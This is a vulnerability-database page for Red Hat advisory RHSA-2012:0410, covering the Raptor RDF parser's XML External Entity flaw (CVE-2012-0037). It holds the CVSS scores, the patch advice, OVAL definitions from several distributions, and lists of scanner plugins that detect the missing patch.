Executive Summary
Summary | |
---|---|
Title | raptor security update |
Informations | |||
---|---|---|---|
Name | RHSA-2012:0410 | First vendor Publication | 2012-03-22 |
Vendor | RedHat | Last vendor Modification | 2012-03-22 |
Severity (Vendor) | Important | Revision | 01 |
Security-Database Scoring CVSS v3
Cvss vector : N/A | |||
---|---|---|---|
Overall CVSS Score | NA | ||
Base Score | NA | Environmental Score | NA |
impact SubScore | NA | Temporal Score | NA |
Exploitabality Sub Score | NA | ||
Calculate full CVSS 3.0 Vectors scores |
Security-Database Scoring CVSS v2
Cvss vector : (AV:N/AC:M/Au:N/C:P/I:N/A:N) | |||
---|---|---|---|
Cvss Base Score | 4.3 | Attack Range | Network |
Cvss Impact Score | 2.9 | Attack Complexity | Medium |
Cvss Expoit Score | 8.6 | Authentication | None Required |
Calculate full CVSS 2.0 Vectors scores |
Detail
Problem Description: Updated raptor packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: Raptor provides parsers for Resource Description Framework (RDF) files. An XML External Entity expansion flaw was found in the way Raptor processed RDF files. If an application linked against Raptor were to open a specially-crafted RDF file, it could possibly allow a remote attacker to obtain a copy of an arbitrary local file that the user running the application had access to. A bug in the way Raptor handled external entities could cause that application to crash or, possibly, execute arbitrary code with the privileges of the user running the application. (CVE-2012-0037) Red Hat would like to thank Timothy D. Morgan of VSR for reporting this issue. All Raptor users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications linked against Raptor must be restarted for this update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 791296 - CVE-2012-0037 raptor: XML External Entity (XXE) attack via RDF files |
Original Source
Url : https://rhn.redhat.com/errata/RHSA-2012-0410.html |
CWE : Common Weakness Enumeration
% | Id | Name |
---|---|---|
100 % | CWE-611 | Information Leak Through XML External Entity File Disclosure |
OVAL Definitions
Definition Id: oval:org.mitre.oval:def:15215 | |||
Oval ID: | oval:org.mitre.oval:def:15215 | ||
Title: | DSA-2438-1 raptor -- programming error | ||
Description: | It was discovered that Raptor, a RDF parser and serializer library, allows file inclusion through XML entities, resulting in information disclosure. | ||
Family: | unix | Class: | patch |
Reference(s): | DSA-2438-1 CVE-2012-0037 | Version: | 5 |
Platform(s): | Debian GNU/Linux 6.0 Debian GNU/kFreeBSD 6.0 | Product(s): | raptor |
Definition Synopsis: | |||
Definition Id: oval:org.mitre.oval:def:16854 | |||
Oval ID: | oval:org.mitre.oval:def:16854 | ||
Title: | USN-1480-1 -- Raptor vulnerability | ||
Description: | Applications using Raptor could be made to expose sensitive information or run programs as your login if they opened a specially crafted file. | ||
Family: | unix | Class: | patch |
Reference(s): | usn-1480-1 CVE-2012-0037 | Version: | 7 |
Platform(s): | Ubuntu 12.04 Ubuntu 11.04 Ubuntu 11.10 Ubuntu 10.04 | Product(s): | raptor |
Definition Synopsis: | |||
|
Definition Id: oval:org.mitre.oval:def:21265 | |||
Oval ID: | oval:org.mitre.oval:def:21265 | ||
Title: | USN-1901-1 -- raptor2 vulnerability | ||
Description: | Applications using Raptor could be made to expose sensitive information or run programs as your login if they opened a specially crafted file. | ||
Family: | unix | Class: | patch |
Reference(s): | USN-1901-1 CVE-2012-0037 | Version: | 5 |
Platform(s): | Ubuntu 12.04 | Product(s): | raptor2 |
Definition Synopsis: | |||
Definition Id: oval:org.mitre.oval:def:21328 | |||
Oval ID: | oval:org.mitre.oval:def:21328 | ||
Title: | RHSA-2012:0410: raptor security update (Important) | ||
Description: | Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document. | ||
Family: | unix | Class: | patch |
Reference(s): | RHSA-2012:0410-01 CESA-2012:0410 CVE-2012-0037 | Version: | 4 |
Platform(s): | Red Hat Enterprise Linux 6 CentOS Linux 6 | Product(s): | raptor |
Definition Synopsis: | |||
Definition Id: oval:org.mitre.oval:def:23828 | |||
Oval ID: | oval:org.mitre.oval:def:23828 | ||
Title: | ELSA-2012:0410: raptor security update (Important) | ||
Description: | Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document. | ||
Family: | unix | Class: | patch |
Reference(s): | ELSA-2012:0410-01 CVE-2012-0037 | Version: | 6 |
Platform(s): | Oracle Linux 6 | Product(s): | raptor |
Definition Synopsis: | |||
Definition Id: oval:org.mitre.oval:def:27837 | |||
Oval ID: | oval:org.mitre.oval:def:27837 | ||
Title: | DEPRECATED: ELSA-2012-0410 -- raptor security update (important) | ||
Description: | [1.4.18-5.1] - Fixed XML entity expansion that could lead to information disclosure (CVE-2012-0037) Resolves: rhbz#804496 | ||
Family: | unix | Class: | patch |
Reference(s): | ELSA-2012-0410 CVE-2012-0037 | Version: | 4 |
Platform(s): | Oracle Linux 6 | Product(s): | raptor |
Definition Synopsis: | |||
CPE : Common Platform Enumeration
OpenVAS Exploits
Date | Description |
---|---|
2012-09-26 | Name : Gentoo Security Advisory GLSA 201209-05 (libreoffice) File : nvt/glsa_201209_05.nasl |
2012-08-30 | Name : Fedora Update for raptor FEDORA-2012-10591 File : nvt/gb_fedora_2012_10591_raptor_fc17.nasl |
2012-08-30 | Name : Fedora Update for raptor2 FEDORA-2012-4629 File : nvt/gb_fedora_2012_4629_raptor2_fc17.nasl |
2012-08-03 | Name : Fedora Update for raptor FEDORA-2012-10590 File : nvt/gb_fedora_2012_10590_raptor_fc16.nasl |
2012-08-03 | Name : Mandriva Update for raptor MDVSA-2012:061 (raptor) File : nvt/gb_mandriva_MDVSA_2012_061.nasl |
2012-08-03 | Name : Mandriva Update for libreoffice MDVSA-2012:063 (libreoffice) File : nvt/gb_mandriva_MDVSA_2012_063.nasl |
2012-07-30 | Name : CentOS Update for raptor CESA-2012:0410 centos6 File : nvt/gb_CESA-2012_0410_raptor_centos6.nasl |
2012-07-30 | Name : CentOS Update for openoffice.org-base CESA-2012:0411 centos5 File : nvt/gb_CESA-2012_0411_openoffice.org-base_centos5.nasl |
2012-07-09 | Name : RedHat Update for raptor RHSA-2012:0410-01 File : nvt/gb_RHSA-2012_0410-01_raptor.nasl |
2012-06-19 | Name : Ubuntu Update for raptor USN-1480-1 File : nvt/gb_ubuntu_USN_1480_1.nasl |
2012-04-30 | Name : Debian Security Advisory DSA 2438-1 (raptor) File : nvt/deb_2438_1.nasl |
2012-04-30 | Name : FreeBSD Ports: raptor2 File : nvt/freebsd_raptor2.nasl |
2012-04-13 | Name : Fedora Update for raptor2 FEDORA-2012-4663 File : nvt/gb_fedora_2012_4663_raptor2_fc16.nasl |
Nessus® Vulnerability Scanner
Date | Description |
---|---|
2014-09-01 | Name : The remote Gentoo host is missing one or more security-related patches. File : gentoo_GLSA-201408-19.nasl - Type : ACT_GATHER_INFO |
2014-06-13 | Name : The remote openSUSE host is missing a security update. File : openSUSE-2012-187.nasl - Type : ACT_GATHER_INFO |
2014-06-13 | Name : The remote openSUSE host is missing a security update. File : openSUSE-2012-183.nasl - Type : ACT_GATHER_INFO |
2013-07-12 | Name : The remote Oracle Linux host is missing one or more security updates. File : oraclelinux_ELSA-2012-0410.nasl - Type : ACT_GATHER_INFO |
2013-07-09 | Name : The remote Ubuntu host is missing a security-related patch. File : ubuntu_USN-1901-1.nasl - Type : ACT_GATHER_INFO |
2012-12-14 | Name : The remote host has an application installed that is affected by multiple vul... File : lotus_symphony_3_0_1_fp2.nasl - Type : ACT_GATHER_INFO |
2012-09-25 | Name : The remote Gentoo host is missing one or more security-related patches. File : gentoo_GLSA-201209-05.nasl - Type : ACT_GATHER_INFO |
2012-09-06 | Name : The remote Mandriva Linux host is missing one or more security updates. File : mandriva_MDVSA-2012-063.nasl - Type : ACT_GATHER_INFO |
2012-08-01 | Name : The remote Scientific Linux host is missing one or more security updates. File : sl_20120322_raptor_on_SL6_x.nasl - Type : ACT_GATHER_INFO |
2012-08-01 | Name : The remote Scientific Linux host is missing one or more security updates. File : sl_20120322_openoffice_org_on_SL5_x.nasl - Type : ACT_GATHER_INFO |
2012-07-31 | Name : The remote Fedora host is missing a security update. File : fedora_2012-10591.nasl - Type : ACT_GATHER_INFO |
2012-07-31 | Name : The remote Fedora host is missing a security update. File : fedora_2012-10590.nasl - Type : ACT_GATHER_INFO |
2012-06-19 | Name : The remote Ubuntu host is missing a security-related patch. File : ubuntu_USN-1480-1.nasl - Type : ACT_GATHER_INFO |
2012-04-23 | Name : The remote Mandriva Linux host is missing one or more security updates. File : mandriva_MDVSA-2012-061.nasl - Type : ACT_GATHER_INFO |
2012-04-13 | Name : The remote Fedora host is missing a security update. File : fedora_2012-4663.nasl - Type : ACT_GATHER_INFO |
2012-04-12 | Name : The remote host is running an application affected by a data leakage vulnerab... File : openoffice_2012_0037.nasl - Type : ACT_GATHER_INFO |
2012-04-12 | Name : The remote SuSE 11 host is missing one or more security updates. File : suse_11_libreoffice-345-120316.nasl - Type : ACT_GATHER_INFO |
2012-04-12 | Name : The remote host is running an application affected by a data leakage vulnerab... File : macosx_libreoffice_351.nasl - Type : ACT_GATHER_INFO |
2012-04-12 | Name : The remote host is running an application affected by a data leakage vulnerab... File : libreoffice_351.nasl - Type : ACT_GATHER_INFO |
2012-04-12 | Name : The remote Fedora host is missing a security update. File : fedora_2012-4629.nasl - Type : ACT_GATHER_INFO |
2012-04-03 | Name : The remote SuSE 10 host is missing a security-related patch. File : suse_libreoffice-345-8022.nasl - Type : ACT_GATHER_INFO |
2012-03-26 | Name : The remote CentOS host is missing one or more security updates. File : centos_RHSA-2012-0410.nasl - Type : ACT_GATHER_INFO |
2012-03-26 | Name : The remote SuSE 11 host is missing one or more security updates. File : suse_11_libraptor-devel-120217.nasl - Type : ACT_GATHER_INFO |
2012-03-26 | Name : The remote FreeBSD host is missing one or more security-related updates. File : freebsd_pkg_60f81af3769011e1942300235a5f2c9a.nasl - Type : ACT_GATHER_INFO |
2012-03-26 | Name : The remote CentOS host is missing one or more security updates. File : centos_RHSA-2012-0411.nasl - Type : ACT_GATHER_INFO |
2012-03-23 | Name : The remote Red Hat host is missing one or more security updates. File : redhat-RHSA-2012-0411.nasl - Type : ACT_GATHER_INFO |
2012-03-23 | Name : The remote Red Hat host is missing one or more security updates. File : redhat-RHSA-2012-0410.nasl - Type : ACT_GATHER_INFO |
2012-03-23 | Name : The remote Debian host is missing a security-related update. File : debian_DSA-2438.nasl - Type : ACT_GATHER_INFO |
Alert History
Date | Informations |
---|---|
2014-02-17 11:55:48 |
|
2013-04-19 13:22:04 |
|